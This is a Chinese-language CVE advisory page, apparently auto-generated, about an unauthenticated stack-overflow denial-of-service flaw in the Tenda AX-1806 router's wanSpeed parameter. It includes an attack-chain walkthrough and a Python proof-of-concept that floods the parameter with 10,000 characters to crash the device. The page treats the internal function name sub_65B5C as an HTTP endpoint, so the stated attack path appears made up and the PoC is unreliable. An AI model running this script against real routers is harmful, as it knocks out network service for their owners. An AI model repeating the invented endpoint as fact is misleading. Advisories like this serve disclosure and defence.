CVE-2025-71019 CVSS 7.5 高危

CVE-2025-71019 Tenda AX-1806 wanSpeed参数栈溢出拒绝服务漏洞

披露日期: 2026-01-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-71019

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AX-1806

漏洞概述

CVE-2025-71019是发生在Tenda AX-1806 v1.0.0.1路由器固件中的一个高危安全漏洞。该漏洞存在于web服务器的sub_65B5C函数中，具体位于处理wanSpeed参数的环节。由于该函数在处理用户输入的wanSpeed参数时未对输入长度进行有效验证，导致攻击者可以通过发送超长的恶意请求数据触发栈溢出。成功利用此漏洞，攻击者可以在无需认证且无需用户交互的情况下，直接造成设备拒绝服务(DoS)，使路由器服务中断。该漏洞的CVSS评分为7.5分，属于高危级别，网络可达性使其具有较高的攻击可行性。

技术细节

该漏洞为典型的栈缓冲区溢出问题。在Tenda AX-1806 v1.0.0.1固件的web服务组件中，sub_65B5C函数负责处理与WAN口速度配置相关的参数。当处理HTTP请求中的wanSpeed参数时，函数将用户输入直接复制到栈上的固定大小缓冲区中，而未进行边界检查。攻击者可通过构造包含超长字符串的wanSpeed参数值（如发送超过预期缓冲区大小的数据），使返回地址和其他栈帧数据被覆盖。虽然该漏洞主要被利用于触发拒绝服务，但栈溢出在特定条件下也可能被用于执行任意代码。攻击者只需构造恶意请求发送到路由器的web管理界面即可，无需任何认证凭据。

攻击链分析

STEP 1

步骤1

攻击者识别目标Tenda AX-1806路由器，并访问其web管理界面

STEP 2

步骤2

攻击者构造包含超长字符串的wanSpeed参数值（超过栈缓冲区大小）

STEP 3

步骤3

攻击者向路由器发送恶意HTTP GET请求到/sub_65B5C端点

STEP 4

步骤4

sub_65B5C函数处理wanSpeed参数时发生栈溢出，覆盖返回地址

STEP 5

步骤5

设备崩溃或进入异常状态，导致拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_ip = "192.168.0.1"
target_port = 80
url = f"http://{target_ip}:{target_port}/cgi-bin/v1/sub_65B5C"

# Construct malicious payload with oversized wanSpeed parameter
# to trigger stack overflow in sub_65B5C function
payload = "A" * 10000

params = {
    "wanSpeed": payload
}

try:
    print(f"[*] Sending malicious request to {url}")
    print(f"[*] Payload length: {len(payload)}")
    
    response = requests.get(url, params=params, timeout=10)
    
    print(f"[!] Response status: {response.status_code}")
    print(f"[!] If device becomes unresponsive, vulnerability is confirmed")
    
except requests.exceptions.RequestException as e:
    print(f"[*] Request failed (device may be crashed): {e}")

影响范围

Tenda AX-1806 v1.0.0.1

防御指南

临时缓解措施

立即停止路由器的web管理界面对外暴露，仅允许通过本地网络访问。监控设备状态，如发现服务异常立即重启。如有条件，考虑更换为已修复该漏洞的路由器型号或等待官方固件更新发布。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表